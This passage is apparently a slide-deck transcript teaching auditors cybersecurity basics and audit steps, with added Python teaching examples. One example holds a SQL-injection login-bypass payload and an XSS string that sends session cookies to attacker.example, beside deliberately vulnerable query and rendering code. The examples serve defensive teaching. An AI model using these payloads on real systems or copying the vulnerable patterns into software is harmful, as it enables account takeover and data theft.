CYBERSECURITY 101: What Non-Technical Auditors Need to Know to Navigate the Cybersecurity Landscape
Presented by David Losacco, CPA, CIA, CISA, Principal
DISCLAIMER
• The comments and statements in this presentation are the opinions of the speaker and do not necessarily reflect the opinions or positions of Stinnett & Associates, LLC.
• This presentation is the property of Stinnett & Associates, LLC. All rights reserved. No part of this document may be reproduced, transmitted or otherwise distributed in any form without written permission from Stinnett & Associates, LLC.
• Stinnett & Associates, LLC expressly disclaims any liability in connection with the use of this presentation or its contents by any third party.
LEARNING OBJECTIVES
• Why should we be concerned with cybersecurity?
• What are some key cybersecurity definitions?
• What are some emerging cybersecurity trends and threats?
• What happened in some recent high-profile cybersecurity attacks?
• What are some cybersecurity roadblocks?
• What steps can Internal Audit take to evaluate your company's cybersecurity risk level?
• What can a non-technical auditor do to evaluate your company's cybersecurity health?
INTRODUCTION TO A CYBER CRIMINAL
WHAT DO ALL THESE COMPANIES HAVE IN COMMON?
… AND THESE
List of recent headlines
AS AUDITORS, WHY DO WE CARE?
Source: 2018 Global Megatrends in Cybersecurity
• 51% of data breaches are caused by organized cyber crime; 18% are caused by nation-states.
• 70% of cyber attacks and data breaches go undetected.
• 69% of organizations learn of their breach from an outside entity such as law enforcement, customers or suppliers.
• In 2017 there were over 130 large-scale targeted breaches in the US, and that number is growing by 27 percent per year.
• Small and mid-size businesses make up 43% of cyber crime targets.
• Cyber crime costs are estimated to reach $6 trillion by 2021.
• 77% of organizations do not have a formal cybersecurity incident response plan.
• 147,900,000 consumer records were impacted by the Equifax breach in 2017 (the US population is 327 million).
• In the 1st quarter of 2017, 60% of malware payloads were ransomware; by the end of 2018 ransomware accounted for only 5% of malware.
• "Fileless" malware attacks increased 432% in 2017.
• Cryptojacking attacks increased 8,500% in 2017.
Security compromises are a persistent business risk.
THEY WANT OUR MONEY
Financial gain is still the #1 motive for cyber attacks and breaches, at over 75% in 2017. Espionage and all other motives combined still make up less than 25%.
• Personally Identifiable Information (PII) is worth more on the black market ("the Dark Web") than credit card numbers.
• Ransomware payments were estimated at over $1 billion in 2017; 70% of ransomware demands were paid.
• Email scams cost businesses over $12 billion in 2018.
• 10% of laundered money is attributable to cyber crime. That number is $200 billion.
Source: Verizon Data Breach Investigations Report 2018
HOW DO THEY DO IT?
Cyber criminals have multiple means to achieve financial gain:
• Theft of funds (bank accounts)
• Extortion (ransomware)
• Selling stolen credit cards
• Selling PII and PHI data
• Insider trading information
• Using the compromised environment for other attacks, renting it out, or mining cryptocurrency on it (cryptojacking)
EVER-CHANGING LANDSCAPE
The types of cyber attacks and exploits are changing:
• Server attacks, once 50% of the total, are trending down.
• User device and person attacks are both trending upward at nearly the same pace, driven by malware, ransomware and phishing attacks.
COMMON TERMS AND DEFINITIONS
Information Technology (IT) – The corporate department that handles the software and hardware that run the normal functions of a typical business or enterprise: the department within a company that is charged with establishing, monitoring and maintaining information technology systems and services.
Operational Technology (OT) – The hardware and software that detects or causes a change through the direct monitoring and/or control of physical devices, processes and events in the enterprise. OT technology and departments are usually found within manufacturing and industrial environments and include Industrial Control Systems (ICS) such as Supervisory Control and Data Acquisition (SCADA) systems. OT devices and environments are typically run separately from IT departments. These are the devices that communicate with pipelines and electrical grids (and nuclear power plants).
Internet of Things (IoT) – A computing concept that describes everyday physical devices (DVR systems, thermostats, refrigerators, vehicles) being connected to the internet and being able to identify themselves to other devices, which enables the devices to collect and exchange data.
ATTACKS IN THE HEADLINES
https://www.businessinsider.com/hackers-stole-a-casinos-database-through-a-thermometer-in-the-lobby-fish-tank-2018-4
https://jsis.washington.edu/news/cyberattack-critical-infrastructure-russia-ukrainian-power-grid-attacks/
COMMON TERMS AND DEFINITIONS
Bot – A bot is a software "robot" that performs an extensive set of automated tasks on its own. Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network. They can also be used by black hats to coordinate attacks by controlling botnets.
Botnet – A number of Internet-connected devices (e.g. computers, DVR systems and other devices), each infected with malware and running one or more bots. Botnets can be used to perform Distributed Denial of Service attacks, steal data, send spam and allow the attacker access to the device and its connection. Botnets can be rented out to other hackers or cyber criminals.
Denial of Service (DoS) and Distributed Denial of Service (DDoS) – A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. A DDoS attack is the same as a DoS attack but involves multiple computers attacking the network from multiple locations. Typically the computers being used are infected members of a botnet.
ATTACKS IN THE HEADLINES
https://www.csoonline.com/article/3258748/the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internet.html
https://www.wired.com/story/reaper-iot-botnet-infected-million-networks/
COMMON TERMS AND DEFINITIONS
Middleware – Software that facilitates the exchange of data between two application programs within the same environment or across different hardware and network environments. Three basic types of middleware are (1) communication middleware, (2) database middleware and (3) system middleware.
Man-in-the-Middle (MITM) Attacks – An attack in which the attacker has been able to place themselves in the middle of communications between two parties. The attacker is able to read or alter the data for their own ends while remaining unknown to the other two parties.
SQL Injection and Cross-Site Scripting (XSS) Attacks – Attacks in which the attacker injects malicious input into a website. In SQL injection the attacker supplies input that the site passes into a database query as SQL, so the database returns (or changes) information the site never intended to expose. In cross-site scripting the attacker injects script into a page so that it runs in the browsers of the site's other users rather than on the server.
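The two injection flaws defined above, as an added example that is not part of the original presentation: a login query and a comment renderer, each in the vulnerable form and the hardened form, run against an in-memory SQLite table with constructed sample rows. The table, column and account names are assumptions made for the demo.

```python
"""SQL injection and cross-site scripting: vulnerable vs. hardened.
Added example with constructed data; not code from the presentation."""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data: two accounts with the kind of PII a breach exposes.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, ssn TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "correct horse", "123-45-6789"),
        ("bob", "hunter2", "987-65-4321"),
    ])
    return conn


def login_vulnerable(conn, username: str, password: str) -> list:
    # VULNERABLE: user input is pasted into the SQL text, so quote characters
    # in the input change the structure of the query itself.
    sql = (f"SELECT username, ssn FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchall()


def login_hardened(conn, username: str, password: str) -> list:
    # HARDENED: a parameterized query. The driver sends the values separately
    # from the SQL text, so nothing in the input can become SQL syntax.
    sql = "SELECT username, ssn FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def render_comment_vulnerable(comment: str) -> str:
    # VULNERABLE: user-supplied text is placed into HTML unescaped, so a
    # <script> tag in one user's comment runs in every other visitor's browser.
    return f"<div class='comment'>{comment}</div>"


def render_comment_hardened(comment: str) -> str:
    # HARDENED: escape on output; the browser displays the tag as plain text.
    return f"<div class='comment'>{html.escape(comment, quote=True)}</div>"


def demo() -> dict:
    conn = make_db()
    # Classic tautology payload: closes the string literal and makes the
    # WHERE clause true for every row, with no valid password at all.
    payload = "' OR '1'='1"
    leaked = login_vulnerable(conn, payload, payload)
    blocked = login_hardened(conn, payload, payload)
    # Stored-XSS payload that would ship the session cookie to an attacker.
    xss = "<script>document.location='https://attacker.example/?c='+document.cookie</script>"
    return {
        "vulnerable_rows": len(leaked),      # 2: every account's SSN comes back
        "hardened_rows": len(blocked),       # 0: the payload is just an unknown username
        "vulnerable_html_has_script": "<script>" in render_comment_vulnerable(xss),
        "hardened_html_has_script": "<script>" in render_comment_hardened(xss),
    }


if __name__ == "__main__":
    print(demo())
```

For an auditor the question to put to the development team is whether every database call is parameterized like `login_hardened` and whether every page escapes user-supplied text on output like `render_comment_hardened`; a single place that does neither is enough for the headlines above.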
ATTACKS IN THE HEADLINES
https://www.zdnet.com/article/man-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable/
https://krebsonsecurity.com/2018/09/secret-service-warns-of-surge-in-atm-wiretapping-attacks/comment-page-1/
https://www.scmagazine.com/home/security-news/cisco-patches-prime-license-manager-sql-injection-vulnerability/
https://www.techrepublic.com/article/british-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions/
COMMON TERMS AND DEFINITIONS
Common Vulnerabilities and Exposures (CVE) – A catalog, maintained by MITRE and sponsored by the US Department of Homeland Security, that documents publicly known vulnerabilities. Vulnerabilities are known errors in a system or software that give an attacker direct access; exposures are known errors that give an attacker indirect access, which may allow the attacker to gather knowledge or content. Many of the malware outbreaks and cyber attacks in the news resulted from attackers exploiting a vulnerability that had been known and fixed by the vendor for months or years but never patched at the company level.
Zero-Day Vulnerability/Attack – An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider. Zero-day vulnerabilities are the most difficult to protect against and detect because of the lack of knowledge and support from the vendor.
Advanced Persistent Threat (APT) – A set of stealthy and continuous computer hacking processes, often orchestrated by a person or group targeting a specific entity.
MALWARE
Malware is short for malicious software. Malware is a broad term that encompasses computer viruses, worms, Trojan horses, spyware, adware and ransomware. Malware is designed to interfere with normal computer operation, usually giving hackers a chance to gain access to your computer and collect sensitive personal information.
• Malware is commonly the first access point used in hacking attempts.
• Ransomware is a variety of malware that has been in the headlines.
• Malware can grant the hackers command and control of a device.
• 1 in 131 emails contained malware in 2016.
• "Fileless" malware is a newer variant that is more difficult to detect because it runs in memory rather than writing an executable to disk for antivirus to scan.
COMPLEXITY BEHIND THE EQUIFAX ATTACK
• The attack started in early March 2017, with the hackers using a bot programmed to search the web for systems affected by a recently released CVE (Common Vulnerabilities and Exposures entry).
• It took the hackers two months before they found the vulnerability on one of Equifax's websites, which was used to help customers with claims.
• The hackers then exploited a CVE in the Apache Struts web application framework running that site (Struts is a web framework, not malware; the flaw was in an unpatched copy of it). The fix had been issued a month before but was never applied.
• The hackers spent an estimated 76 days in the network and downloaded records from 51 different databases.
• Nearly 148 million records were stolen.
• The attack was not identified until July 30, 2017.
EQUIFAX – WHAT WAS LOST
In addition to US consumers, the UK Data Protection Authority, the Information Commissioner's Office, reported:
• Approximately 20,000 UK data subjects had names, dates of birth, telephone numbers and driving licence numbers exposed.
• More than 600,000 UK data subjects had names, dates of birth and telephone numbers exposed.
• Up to 15 million UK data subjects had names and dates of birth exposed.
COMMON TERMS AND DEFINITIONS
Dark Web / Darknet – Websites on the internet that are not reachable by normal search engines or browsers. Darknet sites require special software such as Tor (The Onion Router) that helps keep users anonymous. Darknet sites are used for several illegal activities, such as black-market purchasing of stolen PII or credit card data as well as botnet rentals. Bitcoin is the usual medium of exchange on the Dark Web.
Bitcoin – A digital currency created in 2009. There are no physical bitcoins, only balances recorded on a public ledger (the blockchain) that is replicated across thousands of independent computers along with every Bitcoin transaction, and verified by a massive amount of computing power. Bitcoin mining is the process through which new bitcoins come into circulation: it involves solving a computationally difficult puzzle to discover a new block, which is added to the blockchain, and receiving a reward of a few bitcoins. The network automatically raises the puzzle's difficulty as more computing power joins, so that blocks keep arriving at roughly the same rate; this is why mining consumes ever more computing power.
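The mining puzzle described above, as an added example that is not part of the original presentation: a toy proof-of-work over SHA-256 in which a block is "found" when its hash falls below a target, and each extra bit of difficulty doubles the expected number of hashes. The header string is constructed for the demo and the scheme is simplified (Bitcoin hashes an 80-byte binary header twice; the principle is the same).

```python
"""Toy proof-of-work illustrating Bitcoin mining and difficulty.
Added example; the header and difficulty values are constructed for the demo."""
import hashlib


def block_hash(header: str, nonce: int) -> str:
    # A miner keeps the block contents fixed and varies only the nonce.
    return hashlib.sha256(f"{header}:{nonce}".encode()).hexdigest()


def meets_target(digest_hex: str, difficulty_bits: int) -> bool:
    # The hash must be numerically below the target, i.e. it must start
    # with at least difficulty_bits zero bits. Raising the difficulty by one
    # bit halves the target and doubles the expected search.
    return int(digest_hex, 16) < (1 << (256 - difficulty_bits))


def mine(header: str, difficulty_bits: int, max_nonce: int = 50_000_000):
    """Search nonces until the hash meets the target.
    Returns (nonce, hash, attempts)."""
    for nonce in range(max_nonce):
        digest = block_hash(header, nonce)
        if meets_target(digest, difficulty_bits):
            return nonce, digest, nonce + 1
    raise RuntimeError("no solution below max_nonce")


def verify(header: str, nonce: int, difficulty_bits: int) -> bool:
    # Verification is a single hash: cheap for every node, unlike the search.
    return meets_target(block_hash(header, nonce), difficulty_bits)


if __name__ == "__main__":
    header = "constructed block header: prev=0000abcd, txs=3"
    for bits in (8, 12, 16, 20):
        nonce, digest, attempts = mine(header, bits)
        print(f"{bits:2d} bits: nonce={nonce:8d} attempts={attempts:8d} hash={digest[:16]}...")
```

Running the block shows the attempt count climbing roughly sixteen-fold for every four extra bits; the real network sits at well over 70 bits, which is why a ransomware payment in bitcoin cannot simply be reversed by recomputing the ledger.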
RANSOMWARE
A type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the users' files, unless a ransom is paid. Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decryption key.
• Bitcoin is typically the payment method.
• Ransomware attacks were growing at a rate of 350% annually until 2017 and have since dropped, but remain present (HR and healthcare companies were both hit in February).
• The WannaCry ransomware attack impacted over 200,000 computers across 150 countries (it included a worm, so it spread without any user action).
RANSOMWARE
Ransomware-as-a-Service (RaaS) allows any amateur attacker to get into the business with basic knowledge and less effort. The amateur attacker can visit a RaaS site on the dark web and set up an account to create the ransomware package. It is up to the attacker to distribute the ransomware, while the RaaS operator handles the ransom payments. The RaaS developer takes a cut of any payments that are made, and reduces that cut as the volume of payments received grows.
BUSINESS EMAIL COMPROMISE (BEC)
• Business Email Compromise (BEC) is an exploit targeting a company's corporate email accounts, impersonating or "spoofing" the email identity of an employee or company executive in order to fraudulently obtain money or sensitive information from the company, its business partners and/or employees.
• The FBI's Internet Crime Complaint Center (IC3) said that, based on fraud reports submitted from October 2013 to May 2018, there were 41,058 US victims of BEC schemes, who collectively lost at least $2.9 billion, while global losses were more than four times that amount (FBI: Global Business Email Compromise Losses Hit $12.5 Billion).
• BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (https://www.sec.gov/litigation/investreport/34-84429.pdf). The report was considered a "highly unusual action" by the SEC and identified nine companies that had been specifically investigated by the SEC because of a BEC incident:
• All nine lost at least $1 million to the BEC scam.
• Two companies lost more than $30 million each.
• In total the nine issuers lost almost $100 million.
BEC & PHISHING
Phishing – A form of social engineering in which a message, typically an email with a malicious attachment or link, is sent to a victim with the intent of tricking the recipient into opening the attachment or following the link.
Spear Phishing – Phishing attacks directed at a specific individual or company. Sub-categories of spear phishing include cloning (reusing a previous legitimate email) and whaling (attacking a high-level executive).
• CEO email to the Treasurer
• HR phishing for employee data
• W-2 phishing for tax data (the IRS sent out a warning)
The majority of phishing cases are used as a means to install malware onto a host environment.
PHISHING EMAIL EXAMPLE
Most companies battle the increase in phishing and spear-phishing attacks by labeling each external email with some form of the following insert:
This "band-aid" is still widely in practice today, however.
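The external-mail label described above, plus three BEC tells that a label alone does not catch (an executive's name on an outside mailbox, a look-alike domain, and a Reply-To pointing somewhere other than the sender), as an added example that is not part of the original presentation. The company domain, the executive list and the four sample messages are constructed for the demo.

```python
"""External-mail banner plus three BEC checks a banner alone does not catch.
Added example; the company domain, executive list and messages are constructed."""
from dataclasses import dataclass
from email.utils import parseaddr

COMPANY_DOMAIN = "example.com"                       # assumed internal domain
EXECUTIVES = {"Jane Doe": "jane.doe@example.com"}   # assumed: display name -> real address


@dataclass
class Message:
    sender: str          # raw From: header value
    subject: str
    reply_to: str = ""   # raw Reply-To: header value, if present


def domain_of(header: str) -> str:
    _, addr = parseaddr(header)
    return addr.rpartition("@")[2].lower()


def display_name_of(header: str) -> str:
    name, _ = parseaddr(header)
    return name.strip()


def edit_distance(a: str, b: str) -> int:
    # Levenshtein distance; one or two edits is the signature of a look-alike domain.
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def analyze(msg: Message):
    """Return (subject as the user will see it, list of warning codes)."""
    warnings = []
    subject = msg.subject
    from_domain = domain_of(msg.sender)
    if from_domain != COMPANY_DOMAIN:
        # The band-aid most companies apply: tag anything from outside.
        subject = "[EXTERNAL] " + subject
        # An executive's display name on an outside mailbox is the classic
        # CEO-to-treasurer wire fraud setup.
        if display_name_of(msg.sender) in EXECUTIVES:
            warnings.append("exec_impersonation")
        # A registered domain a character or two away from ours.
        if edit_distance(from_domain, COMPANY_DOMAIN) <= 2:
            warnings.append("lookalike_domain")
    # Replies silently redirected to a mailbox the attacker controls.
    if msg.reply_to and domain_of(msg.reply_to) != from_domain:
        warnings.append("reply_to_mismatch")
    return subject, warnings


SAMPLES = [  # constructed messages
    Message("Jane Doe <jane.doe@example.com>", "Q3 numbers"),
    Message("Jane Doe <jane.doe.ceo@gmail.com>", "Urgent wire before 5pm"),
    Message("AP Team <ap@examp1e.com>", "Updated bank details for next payment"),
    Message("Vendor Billing <billing@vendor-example.net>", "Invoice 1042",
            reply_to="billing@mail-redirect.example.org"),
]


def run_samples():
    return [(m.sender, *analyze(m)) for m in SAMPLES]


if __name__ == "__main__":
    for sender, subject, warns in run_samples():
        print(f"{sender:45s} -> {subject!r} {warns}")
```

Only the first message passes clean; the other three all carry the [EXTERNAL] tag, which is exactly why the tag on its own is a band-aid: the treasurer still has to notice it, whereas the three warning codes can be routed to a mailbox rule or the finance team's verification step.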
BEC & OFFICE 365
• Office 365 is Microsoft's cloud-based solution offering everything from email and Excel to cloud storage.
• Microsoft Office 365 is now in use at over 70% of Fortune 500 companies.
• 20% of all companies use Office 365.
• Office 365 overtook traditional Office products in the 4th quarter of 2017 as the largest revenue stream for Microsoft.
• Most companies do not correctly set up Office 365 security or logging.
• There has been a significant increase in attack vectors against Office 365.
• It only takes one employee's credentials and the hacker is inside email and Office 365.
• Some attack vectors do not require a phishing email.
BEC ATTACK WALKTHROUGH
BEC – PROTECT YOUR CASH
Accounting controls at all entry/exit points for cash:
Cash Receipts
• Review of balances over 60 days and $10k – a triggered review and communication uncovered a change in bank info (communication was being sent to a deleted email address).
• Reports that generate overdue receivables on time for follow-up.
• Escalation rules for overdue receivables.
Cash Disbursements
• Segregation of duties – limit access to the vendor master file.
• Controls over changing bank info for all vendors – need more than email communication; personal verification with the vendor requesting the change.
• Vendor set-up – verification of the information provided.
• ISNetworld – vetting process for vendors; could require vetting prior to set-up as a vendor.
• ACH debits – no reason to give debit access to the account; if done, dual approval and a ZBA should be used.
• Multi-factor authentication.
Other Processes to Consider
• Treasury
• Payroll
• Royalties
• SOX impact
• Cyber insurance
• Legal liabilities
• Contract language
MULTI-FACTOR AUTHENTICATION
• Google has not had any of its 85,000+ employees successfully phished on their work-related accounts since early 2017, when it began requiring all employees to use physical security keys in place of passwords and one-time codes.
• Office 365 and other cloud-based services should all use multi-factor authentication.
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach.
The main reasons for companies' struggles are:
• Lack of skilled resources (people and time)
• Lack of funds
• Continued innovation in technology
• Expansion of the attack surface
• Lack of understanding of the company's information assets and their value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
DEFENSE-IN-DEPTH APPROACH
A defense-in-depth approach to cybersecurity is a layered approach that recognizes a company's first line of defense may fail, and integrates multiple layers of defense around a company's information assets. Also called the castle approach (once you breach the walls, more defenses are in place).
CYBERSECURITY DEFENSE IN-DEPTH
• Patch management
• Operating system end of life (EOL)
• Network vulnerability scanning
• Security staffing
• Internal & external network boundaries
• Wireless security
• Firewall implementation and monitoring (including next-generation firewalls)
• IPS / IDS / SIEM implementations
• Firewall dataflow & standards documentation
• Cloud service provider evaluations
• Security incident management
• Physical security
• Evaluation of encryption technologies
• Network access control
• Workstation endpoint protection
The three dimensions of defense in depth are people, technology and processes.
THE PEOPLE CHALLENGE – Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE – The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE – Ensure best-practice processes and associated management frameworks are in place. Regular audits and reviews are important.
WHERE AUDIT CAN HELP
Step 1 – Identify risks through a formal risk assessment of assets.
Step 2 – Perform a baseline gap analysis of the current control environment against industry-standard frameworks, and identify the controls which need to be implemented to reduce the risk of cybersecurity incidents affecting critical data assets.
Step 3 – Make recommendations on the implementation and ongoing management of cybersecurity controls.
Step 4 – Follow-up reviews to monitor control implementation progress.
Repeat.
Cycle: Risk Assessments → Create a Baseline / Gap Analysis → Implement and Manage Controls → Assess & Report
STEP 1 – CYBERSECURITY RISK ASSESSMENT
• Perform risk assessments to understand the organizational risk and where high-risk assets exist.
• The risk assessment should include interviews of departments outside IT to ensure all critical data asset types are identified.
• Work with IT to classify each of the asset types to assist in measuring the overall risk of a cybersecurity event.
• Consider using a threat modeling tool to semi-qualitatively measure cybersecurity risks, in order to identify, estimate and prioritize information security risks.
Process: Identification of Assets → Asset Locations → Classification of Assets → Threat Modeling → Calculated Risk Results
Key to an effective cybersecurity program is understanding the company's information assets.
• What value do the assets have?
• Credit card data
• Employee or customer records
• Bank accounts
• Intellectual property
• Trade secrets
• Insider knowledge
• Data location
• Cash-in / cash-out processes
• Who would want the data?
STEP 1 – CYBERSECURITY RISK ASSESSMENT
• Through formal risk assessments with all critical functions in the business, identify where data lives and how the data should be classified, then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring. This allows you to determine which critical data assets in your environment are most at risk of a cybersecurity incident.
• Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business.
[Example screenshot of a critical data asset risk assessment]
STEP 2 – BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place.
• Evaluate control design as it relates to commonly accepted framework(s).
• Identify control gaps and create a baseline for cybersecurity maturity in the organization.
• Use the cybersecurity maturity baseline and the risk assessment results to identify and prioritize the controls to implement, starting with the highest-priority, most impactful controls.
STEP 3 – CONTROLS ANALYSIS
• The baseline gap analysis facilitates the identification of the controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment).
• Work with IT management to identify realistic and feasible mitigating controls and an implementation roadmap.
[Chart: Mitigating Control Counts – the number of (asset, threat) instances each candidate control mitigates]
A) Identify information systems with a calculated cybersecurity risk > 100.
B) Does the information system have a specific threat with a cybersecurity risk over 100 (Yes/No)? If yes, move to the next step.
C) Identify mitigating controls to implement against that threat.
D) Total all instances where each control reduced risk.
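Steps A through D above, and the semi-qualitative threat scoring of Step 1, run end to end as an added example that is not part of the original presentation. The scoring formula (asset classification × likelihood × impact), the 1–5 and 1–10 scales, the four assets, their threats and the threat-to-control mapping are all assumptions constructed for the demo; only the > 100 threshold and the four steps come from the deck.

```python
"""Steps A-D of the controls analysis over a constructed asset inventory.
Added example: the formula, scales, assets, threats and the threat-to-control
mapping are assumptions for the demo, not the presentation's data."""
from collections import Counter
from dataclasses import dataclass

THRESHOLD = 100  # the deck's cut-off for (asset, threat) pairs that get a control


@dataclass(frozen=True)
class Asset:
    name: str
    classification: int   # assumed scale: 1 public .. 5 restricted
    threats: tuple        # ((threat, likelihood 1-10, impact 1-10), ...)


# Assumed mapping of each threat to candidate mitigating controls.
CONTROLS = {
    "phishing": ("security awareness training", "multi-factor authentication",
                 "email filtering"),
    "unpatched internet-facing system": ("continuous vulnerability scanning",
                                         "patch management"),
    "ransomware": ("endpoint protection", "tested offline backups", "patch management"),
    "privileged account misuse": ("least-privilege access review",
                                  "multi-factor authentication",
                                  "privileged activity logging"),
}

ASSETS = [  # constructed inventory
    Asset("Payroll database", 5, (("phishing", 6, 8), ("privileged account misuse", 4, 9),
                                 ("ransomware", 5, 9))),
    Asset("Public website", 2, (("unpatched internet-facing system", 7, 7),
                               ("phishing", 2, 3))),
    Asset("Customer PII file share", 5, (("ransomware", 6, 8),
                                        ("unpatched internet-facing system", 3, 6))),
    Asset("Treasury workstation", 4, (("phishing", 7, 9),
                                     ("privileged account misuse", 3, 5))),
]


def risk_score(classification: int, likelihood: int, impact: int) -> int:
    # Assumed semi-quantitative formula: asset class x likelihood x impact (max 500).
    return classification * likelihood * impact


def analyze(assets):
    high_risk_assets = []   # step A: systems with any calculated risk > 100
    pairs = []              # step B: the specific (asset, threat) pairs over 100
    plan = {}               # step C: controls chosen for each such pair
    counts = Counter()      # step D: how many risk instances each control reduces
    for asset in assets:
        scored = {t: risk_score(asset.classification, lik, imp)
                  for t, lik, imp in asset.threats}
        if max(scored.values()) > THRESHOLD:
            high_risk_assets.append(asset.name)
        for threat, score in scored.items():
            if score > THRESHOLD:
                pairs.append((asset.name, threat, score))
                plan[(asset.name, threat)] = CONTROLS[threat]
                counts.update(CONTROLS[threat])
    return high_risk_assets, pairs, plan, counts


def priority_order(counts: Counter):
    # The control that reduces the most instances of risk is implemented first;
    # ties are broken alphabetically so the roadmap is reproducible.
    return [c for c, _ in sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))]


if __name__ == "__main__":
    systems, pairs, plan, counts = analyze(ASSETS)
    print("Step A high-risk systems:", systems)
    for name, threat, score in pairs:
        print(f"Step B/C {name}: {threat} = {score} -> {plan[(name, threat)]}")
    print("Step D mitigating control counts:", dict(counts))
    print("Roadmap order:", priority_order(counts))
```

With this data the public website scores 98 on its worst threat and drops out at step A, while multi-factor authentication tops the step D count because it mitigates both phishing and privileged-account misuse; that count is the bar in the chart above and the first item on the implementation roadmap.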
STEP 4 – CYBERSECURITY REPORTING
• Leverage the information gained during the project to provide management with a detailed mapping of the organization's cybersecurity position.
• Consider using the COBIT Process Capability Model to map out the CSC framework, which will allow management to begin tracking cybersecurity maturity:
5 = Optimized
4 = Predictable
3 = Established
2 = Managed
1 = Performed
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
• NIST SP 800-53 Rev. 5 – Security and Privacy Controls for Information Systems and Organizations
• NIST Cybersecurity Framework v1.1
• Various other NIST special publications
Center for Internet Security
• Critical Security Controls (formerly the SANS Top 20)
International Organization for Standardization
• ISO 27001 family – Information security management systems
ISACA
• Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matter? Companies with more than 10,000 employees are slightly more likely to have adopted a security framework (90%), but even smaller companies with fewer than 1,000 employees report significant rates of adoption (77%). – Source: itgovernanceusa.com
According to Tenable's Trends in Security Framework Adoption Survey, 84% of organizations in the US leverage a security framework and 44% use more than one framework. – Source: itgovernanceusa.com
CENTER FOR INTERNET SECURITY – CRITICAL SECURITY CONTROLS
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
• Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems. Don't just think SOX.
• Confirm IT is not using privileged accounts for daily tasks, which can include browsing the internet or answering email.
• Determine whether privileged and admin account passwords are held to a higher standard than normal accounts (complexity, length, change frequency, sharing).
• Consider how IT monitors and is alerted on changes to elevated privileges.
User Cybersecurity Training and Awareness
• Companies often fail to implement basic end-user training around cybersecurity. Often the uneducated or untrained end user is the cyber attacker's first entry point into the company.
• Determine whether your company conducts random phishing awareness campaigns.
• Evaluate your company's overall cybersecurity training and awareness program.
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
Vulnerability Management
• Most companies fail to implement sound patch management processes and procedures.
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published.
• Companies do not know all of the devices on their network and therefore are unable to adequately assess their patch management process.
• Ensure your IT department is scanning all assets continuously so that newly discovered vulnerabilities are identified quickly.
• Validate that the patch management process is effective in ensuring all IT devices are properly updated (patched) to the latest software update or release from the vendor. This includes workstations, servers, network equipment, VMware, Citrix, non-Microsoft software, etc.
• If known vulnerabilities cannot be patched for business reasons, determine whether those risks are formally accepted and tracked by management. Assess whether there are sufficient mitigating controls in place.
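The patch-age test an auditor would run over the last two bullets above, as an added example that is not part of the original presentation: each device's outstanding patch is aged against a window that is shorter for internet-facing systems, and anything over the window is matched against management's risk-acceptance register to separate tracked exceptions from untracked and lapsed ones. The audit date, the 14-day and 30-day windows, the inventory and the register are all constructed assumptions.

```python
"""Patch-age check over a constructed device inventory and risk-acceptance register.
Added example: the SLA windows, audit date, inventory and register are assumptions."""
from datetime import date

AS_OF = date(2019, 3, 1)              # assumed audit date
SLA_DAYS = {True: 14, False: 30}      # assumed windows: internet-facing vs internal

INVENTORY = [  # constructed: one row per (device, software)
    {"host": "web01", "internet_facing": True, "software": "Java runtime",
     "installed": "1.4", "current": "1.5", "patch_released": date(2019, 2, 20)},
    {"host": "web02", "internet_facing": True, "software": "Web server",
     "installed": "2.1", "current": "2.2", "patch_released": date(2018, 12, 1)},
    {"host": "erp01", "internet_facing": False, "software": "Java runtime",
     "installed": "1.2", "current": "1.5", "patch_released": date(2018, 6, 1)},
    {"host": "fs01", "internet_facing": False, "software": "Operating system",
     "installed": "build 1", "current": "build 2", "patch_released": date(2018, 9, 1)},
    {"host": "ws042", "internet_facing": False, "software": "Browser",
     "installed": "71", "current": "71", "patch_released": date(2019, 1, 29)},
]

RISK_ACCEPTANCES = [  # constructed: management sign-off for patches that cannot be applied
    {"host": "erp01", "software": "Java runtime", "accepted_by": "CIO",
     "expires": date(2019, 6, 30), "compensating": "network segmentation"},
    {"host": "fs01", "software": "Operating system", "accepted_by": "CIO",
     "expires": date(2018, 12, 31), "compensating": "none recorded"},
]


def acceptance_for(host: str, software: str):
    for acc in RISK_ACCEPTANCES:
        if acc["host"] == host and acc["software"] == software:
            return acc
    return None


def classify(row: dict, as_of: date = AS_OF) -> dict:
    """Return the row plus days_outstanding and one of:
    current, compliant, overdue, accepted, accepted-expired."""
    if row["installed"] == row["current"]:
        return {**row, "days_outstanding": 0, "status": "current"}
    days = (as_of - row["patch_released"]).days
    if days <= SLA_DAYS[row["internet_facing"]]:
        status = "compliant"             # still inside the patch window
    else:
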